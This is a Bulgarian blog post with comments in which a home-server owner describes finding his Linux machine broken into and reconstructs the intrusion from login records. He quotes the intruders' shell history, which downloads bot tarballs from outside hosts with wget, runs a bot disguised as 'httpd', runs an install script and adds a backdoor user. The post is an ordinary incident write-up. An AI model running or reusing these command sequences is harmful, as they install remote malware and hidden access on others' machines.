Кракнаха ме

Днес нетипично за мен, реших да се логна като root и гледам last login from prag164.server4you.de и то от снощи. Викам си, бре хакнали са ме, ама нищо не бях усетил, май не са трили нищо (дано, още не съм разследвал всичко). Пуснах един netstat-tupan и гледам някакъв процес слуша на 58 хиляди и някой порт с име httpd и го kill-нах. Освен това май имаше и един ssh тунел или просто увиснала сесия, но и нея убих преди да определя точно. Започнах да търся какво са правили.

#last 
koders   pts/0        213.193.222.30   Sun May  1 22:09 - 22:10  (00:01)    
koders   pts/0        213.193.222.30   Sun May  1 21:14 - 21:14  (00:00)    
ifos     vc/3                          Sun May  1 21:04 - 00:03  (02:58)    
iko      vc/4                          Sun May  1 17:14   still logged in   
iko      vc/8                          Sun May  1 17:13   still logged in   
koders   pts/0        prag164.server4y Sun May  1 16:24 - 16:30  (00:06)    
root     pts/1        prag164.server4y Sun May  1 16:17 - 16:24  (00:06)    
root     pts/0        prag164.server4y Sun May  1 16:16 - 16:19  (00:03)

Яяя дори са си направили потребител koders без много да му мислят. Дори си има и home директория. Изтрих koders от /etc/passwd и после един преглед на .bash_history

# cat .bash_history 
cd /var/tmp
cd .bash
ls
wget www.onhelp.go.ro/dns.tgz
cd ..
mkdir .a
cd .a
wget www.onhelp.go.ro/dns.tgz
ps -x
ps -aux
tar -zxvf dns.tgz
cd dns
mv bot httpd
chmod 777 httpd
export PATH="."
httpd
wget http://heanet.dl.sourceforge.net/sourceforge/undernet-ircu/ircu2.10.11.07.tar.gz
ps -aux
kill -9 5167
cd /var/tmp
ls
ls -a
cd .a
ls
cd dns
export PATH="."
httpd
exit

Отивам в /usr/tmp и доколкото разбрах са си компилирали някъв irc bot emergymech. От тази им постъпка си мисля, че са просто разни script kiddies, които се хвалят в IRC с всяка пробита машина. Това което ме притеснява, е че са влизали като root. Не са чистили много логове (може би хич) и редовете от .bash_history, които не са мои са :

[B
[B
w
cd /var/tmp   
mkdir .bash  
wget www.filiasi.com/thug.tgz
wget www.filiasi.com/tupac.tgz
tar -zxvf 
tar -zxvf tupac.tgz
cd muie
id
./install
adduser koders
passwd koders

Влизали са от два компютъра 62.75.224.165 (prag164.server4you.de), което е в Германия и 213.193.222.30, което е в Холандия. Видях конфигурацията на бот-а : канал #OnHelp в Undernet. Влезнах там, но се задържах само няколко секунди, докато някой ми каза IkO_, say a и получих бан. Не се занимавах повече, освен че видях инфото на този, които ме изрита и там се рекламираше сайт www.koderS.biz. От този сайт, и малко с помощта на Йонов, защото нямам photoshop, видях че най-вероятно са румънци, което малко ме учуди, защото ги мислех за холандци.

Честно казано цялата работа, дори малко ме ласкае, защото не вярвах, че моята домашна машинка, на мизерна връзка, може да е приманлива цел за проникване. Лошото, е че не разбрах точно как са влезнали първоначално. Имам пуснати OpenSSH 4.0p1-1 и Apache 2.0.54-1, и двете от пакети на ArchLinux, където всичко по принцип е най-последна версия. Другия вариант е да са ми познали root паролата, която беше нормална английска дума. Сканирано ми е Apache-то за разни популярни директории и файлове, но на всичко е върнало 404, освен на нормания GET. Мисля си, да не е някой модул за него ?!? Или да има exploit за последната версия на OpenSSH ?!?

п.с. сега като препрочитам виждам, че бота са го свалили точно от румънски сайт, което потвърждава теорията, че са румънци. Дано не ме ядосат повече, защото не ми се занимава с глупости. Мислех, че това минал период за мен. Дано да остане така. За сега не мисля да им играя по свирката.

4 thoughts on “Кракнаха ме

  1. Ице всъщност това mac-a не ми го отвори с фотошоп… използвах openoffice.

  2. Мда, прав си 🙂 Тогава съм се заблудил защото започва с adobe photoshop нещо си. А сега като го записах и file си каза, че е обикновен JPEG 🙂 А и ти тогава не каза нещо специално и си помислих, че си го отворил с photoshop-а.

  3. “Другия вариант е да са ми познали root паролата, която беше нормална английска дума.”

    Мдам. Грешка номер 1.

    Съвет: не се задоволявай с преинсталация на какъвто и да е пакет. Започни на чисто. Не вярвай на нито един файл в тази файлова система.

Коментирай